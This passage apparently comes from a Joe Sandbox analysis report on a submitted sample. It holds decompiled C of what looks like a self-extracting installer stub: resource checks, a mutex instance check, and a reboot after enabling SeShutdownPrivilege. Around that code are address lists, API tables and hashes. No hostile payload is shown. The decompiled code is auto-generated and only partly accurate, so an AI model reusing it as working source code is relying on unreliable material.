                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0x10d8a2c != 0 &&  *0x10d8b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x10d9a3c, 0x10d8b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E010D66C8(0x10d8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x010d5d64
                                                                                                                                                                                                                                            0x010d5d64
                                                                                                                                                                                                                                            0x010d5d64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d62
                                                                                                                                                                                                                                            0x010d5d5b
                                                                                                                                                                                                                                            0x010d5d4f
                                                                                                                                                                                                                                            0x010d5d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d9f
                                                                                                                                                                                                                                            0x010d5d9f
                                                                                                                                                                                                                                            0x010d5da5
                                                                                                                                                                                                                                            0x010d5dab
                                                                                                                                                                                                                                            0x010d5dba
                                                                                                                                                                                                                                            0x010d6218
                                                                                                                                                                                                                                            0x010d621d
                                                                                                                                                                                                                                            0x010d6220
                                                                                                                                                                                                                                            0x010d6221
                                                                                                                                                                                                                                            0x010d6229
                                                                                                                                                                                                                                            0x010d6230
                                                                                                                                                                                                                                            0x010d6247
                                                                                                                                                                                                                                            0x010d626a
                                                                                                                                                                                                                                            0x010d6272
                                                                                                                                                                                                                                            0x010d6249
                                                                                                                                                                                                                                            0x010d6255
                                                                                                                                                                                                                                            0x010d625f
                                                                                                                                                                                                                                            0x010d6264
                                                                                                                                                                                                                                            0x010d6264
                                                                                                                                                                                                                                            0x010d6284
                                                                                                                                                                                                                                            0x010d5dc0
                                                                                                                                                                                                                                            0x010d5dc0
                                                                                                                                                                                                                                            0x010d5dca
                                                                                                                                                                                                                                            0x010d5e22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5dcc
                                                                                                                                                                                                                                            0x010d5dce
                                                                                                                                                                                                                                            0x010d5e24
                                                                                                                                                                                                                                            0x010d5e24
                                                                                                                                                                                                                                            0x010d5e2c
                                                                                                                                                                                                                                            0x010d5e47
                                                                                                                                                                                                                                            0x010d5e4a
                                                                                                                                                                                                                                            0x010d61d2
                                                                                                                                                                                                                                            0x010d61e2
                                                                                                                                                                                                                                            0x010d61e7
                                                                                                                                                                                                                                            0x010d61ee
                                                                                                                                                                                                                                            0x010d61f1
                                                                                                                                                                                                                                            0x010d61f1
                                                                                                                                                                                                                                            0x010d61f8
                                                                                                                                                                                                                                            0x010d61f8
                                                                                                                                                                                                                                            0x010d5e50
                                                                                                                                                                                                                                            0x010d5e53
                                                                                                                                                                                                                                            0x010d6109
                                                                                                                                                                                                                                            0x010d611f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6125
                                                                                                                                                                                                                                            0x010d6137
                                                                                                                                                                                                                                            0x010d613a
                                                                                                                                                                                                                                            0x010d613c
                                                                                                                                                                                                                                            0x010d613e
                                                                                                                                                                                                                                            0x010d613e
                                                                                                                                                                                                                                            0x010d6141
                                                                                                                                                                                                                                            0x010d6141
                                                                                                                                                                                                                                            0x010d6143
                                                                                                                                                                                                                                            0x010d6144
                                                                                                                                                                                                                                            0x010d614a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6150
                                                                                                                                                                                                                                            0x010d6152
                                                                                                                                                                                                                                            0x010d615c
                                                                                                                                                                                                                                            0x010d6170
                                                                                                                                                                                                                                            0x010d6172
                                                                                                                                                                                                                                            0x010d617c
                                                                                                                                                                                                                                            0x010d6190
                                                                                                                                                                                                                                            0x010d6190
                                                                                                                                                                                                                                            0x010d6196
                                                                                                                                                                                                                                            0x010d61a5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d61ab
                                                                                                                                                                                                                                            0x010d61b9
                                                                                                                                                                                                                                            0x010d61c6
                                                                                                                                                                                                                                            0x010d61c6
                                                                                                                                                                                                                                            0x010d617e
                                                                                                                                                                                                                                            0x010d6180
                                                                                                                                                                                                                                            0x010d618a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d618a
                                                                                                                                                                                                                                            0x010d615e
                                                                                                                                                                                                                                            0x010d6160
                                                                                                                                                                                                                                            0x010d616a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d616a
                                                                                                                                                                                                                                            0x010d615c
                                                                                                                                                                                                                                            0x010d614a
                                                                                                                                                                                                                                            0x010d610b
                                                                                                                                                                                                                                            0x010d610e
                                                                                                                                                                                                                                            0x010d610e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e59
                                                                                                                                                                                                                                            0x010d5e59
                                                                                                                                                                                                                                            0x010d5e5c
                                                                                                                                                                                                                                            0x010d604f
                                                                                                                                                                                                                                            0x010d6056
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5f07
                                                                                                                                                                                                                                            0x010d5f02
                                                                                                                                                                                                                                            0x010d5efc
                                                                                                                                                                                                                                            0x010d5ef7
                                                                                                                                                                                                                                            0x010d5ef2
                                                                                                                                                                                                                                            0x010d5f4c
                                                                                                                                                                                                                                            0x010d5f4e
                                                                                                                                                                                                                                            0x010d5f50
                                                                                                                                                                                                                                            0x010d5f54
                                                                                                                                                                                                                                            0x010d5ed4
                                                                                                                                                                                                                                            0x010d5ea2
                                                                                                                                                                                                                                            0x010d5ea4
                                                                                                                                                                                                                                            0x010d5eaf
                                                                                                                                                                                                                                            0x010d5eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e79
                                                                                                                                                                                                                                            0x010d5e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e83
                                                                                                                                                                                                                                            0x010d5e83
                                                                                                                                                                                                                                            0x010d5e83
                                                                                                                                                                                                                                            0x010d5e85
                                                                                                                                                                                                                                            0x010d5e85
                                                                                                                                                                                                                                            0x010d5e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e94
                                                                                                                                                                                                                                            0x010d5e8e
                                                                                                                                                                                                                                            0x010d5e7d
                                                                                                                                                                                                                                            0x010d5e77
                                                                                                                                                                                                                                            0x010d5e6e
                                                                                                                                                                                                                                            0x010d5e65
                                                                                                                                                                                                                                            0x010d5e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5dd0
                                                                                                                                                                                                                                            0x010d5dd0
                                                                                                                                                                                                                                            0x010d5dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5dd0
                                                                                                                                                                                                                                            0x010d5dce
                                                                                                                                                                                                                                            0x010d5dca
                                                                                                                                                                                                                                            0x010d5dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d00
                                                                                                                                                                                                                                            0x010d5dd9
                                                                                                                                                                                                                                            0x010d5e04
                                                                                                                                                                                                                                            0x010d61fe
                                                                                                                                                                                                                                            0x010d5e0a
                                                                                                                                                                                                                                            0x010d5e0c
                                                                                                                                                                                                                                            0x010d5e17
                                                                                                                                                                                                                                            0x010d5e17
                                                                                                                                                                                                                                            0x010d5e04
                                                                                                                                                                                                                                            0x010d6200
                                                                                                                                                                                                                                            0x010d6200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 010D5CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(010D8B3E,00000104,00000000,?,?), ref: 010D5DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 010D5E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 010D5EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010D5F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 010D5FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 010D6008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 010D60AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,010D1140,00000000,00000040,00000000), ref: 010D61F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 010D61F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: d4ad51167d742c183a3a4d72dd566cac846b3f39fc259af342b087e2309d1a30
                                                                                                                                                                                                                                            • Instruction ID: ce8f09d04842bd57c02f33e24f0dace517a9c3a8bda191de84b277cfac7e2e3b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ad51167d742c183a3a4d72dd566cac846b3f39fc259af342b087e2309d1a30
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75D18971A043455EEF7ADA3C8C487FA3FF1AB56344F0481EADDC6CA185DA7689828F50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E010D1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0x10d9a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E010D44B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E010D6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E010D44B9(0, 0x522, 0x10d1140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E010D1EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010D1EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 010D1F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 010D1FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: 0eaeaa5b9f4954a4819a8a180eacda5e12447abd22f1dec901bc0ccd3a868f4d
                                                                                                                                                                                                                                            • Instruction ID: b59a6de032dd9c229f4e34e3385ef1aeedafa399fab3332b1defc4892c7bed3a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eaeaa5b9f4954a4819a8a180eacda5e12447abd22f1dec901bc0ccd3a868f4d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B02124B1B41305BBDB309AA5DC49FBF7AF8EB85B10F100098FA82E7085DF7A84408361
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x010d6cf7
                                                                                                                                                                                                                                            0x010d6d00
                                                                                                                                                                                                                                            0x010d6d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010D6E26,010D1000), ref: 010D6CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(010D6E26,?,010D6E26,010D1000), ref: 010D6D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,010D6E26,010D1000), ref: 010D6D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,010D6E26,010D1000), ref: 010D6D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: 606a5ce0b780926854fccb197424ac30f5bf9f12aa1b0f54b92ecdf0e281bc69
                                                                                                                                                                                                                                            • Instruction ID: 295ea596412ff2cb4873167e73470c175cb90cb7fcf53ba21d76227c7b83a1ba
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606a5ce0b780926854fccb197424ac30f5bf9f12aa1b0f54b92ecdf0e281bc69
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAD0123A201108FBDB202BF1E80CA593F28FB48393F444000FB5D83004CB3B4451CB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E010D2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0x10d9a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0x10d9140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0x10d8a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0x10d88c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0x10d93ec = 1;
                                                                                                                                                                                                                                            				_t20 = E010D468F("TITLE", 0x10d9154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0x10d858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0x10d9a34;
                                                                                                                                                                                                                                            					if(E010D468F("EXTRACTOPT", 0x10d9a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0x10d9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0x10d9120 =  *0x10d9120 & _t65;
                                                                                                                                                                                                                                            							if(E010D5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0x10d8a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x10d8184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x10d8a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E010D36EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0x10d9a40;
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0x10d9a34 & 0x00000100) == 0 || ( *0x10d8a38 & 0x00000001) != 0 || E010D18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E010D6517(_t57, 0x7d6, _t34, E010D19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E010D2390(0x10d8a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E010D44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E010D468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0x10d8588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0x10d9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E010D44B9(0, 0x524, 0x10d9154, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E010D44B9(0, 0x54b, 0x10d9154, 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0x10d8588);
                                                                                                                                                                                                                                            										 *0x10d9124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2da3
                                                                                                                                                                                                                                            0x010d2dae
                                                                                                                                                                                                                                            0x010d2db4
                                                                                                                                                                                                                                            0x010d2dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2dca
                                                                                                                                                                                                                                            0x010d2dd3
                                                                                                                                                                                                                                            0x010d2df5
                                                                                                                                                                                                                                            0x010d2e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2dd5
                                                                                                                                                                                                                                            0x010d2dde
                                                                                                                                                                                                                                            0x010d2de3
                                                                                                                                                                                                                                            0x010d2e04
                                                                                                                                                                                                                                            0x010d2e0a
                                                                                                                                                                                                                                            0x010d2e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2e10
                                                                                                                                                                                                                                            0x010d2dd3
                                                                                                                                                                                                                                            0x010d2dbb
                                                                                                                                                                                                                                            0x010d2da1
                                                                                                                                                                                                                                            0x010d2d5b
                                                                                                                                                                                                                                            0x010d2d5b
                                                                                                                                                                                                                                            0x010d2d5d
                                                                                                                                                                                                                                            0x010d2d69
                                                                                                                                                                                                                                            0x010d2d6e
                                                                                                                                                                                                                                            0x010d2f06
                                                                                                                                                                                                                                            0x010d2f06
                                                                                                                                                                                                                                            0x010d2f06
                                                                                                                                                                                                                                            0x010d2d59
                                                                                                                                                                                                                                            0x010d2f18

